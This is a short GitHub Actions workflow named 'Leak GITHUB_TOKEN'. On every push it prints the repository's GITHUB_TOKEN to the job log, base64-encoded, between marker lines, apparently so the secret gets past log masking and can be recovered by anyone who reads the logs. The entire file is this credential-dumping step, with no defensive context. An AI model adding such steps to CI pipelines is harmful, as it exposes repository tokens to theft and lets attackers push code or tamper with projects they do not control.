name: Leak GITHUB_TOKEN

on: [push]

jobs:
  leak:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2

      - name: Dump GITHUB_TOKEN
        run: |
          echo "TOKEN START"
          echo "$GITHUB_TOKEN" | base64
          echo "TOKEN END"
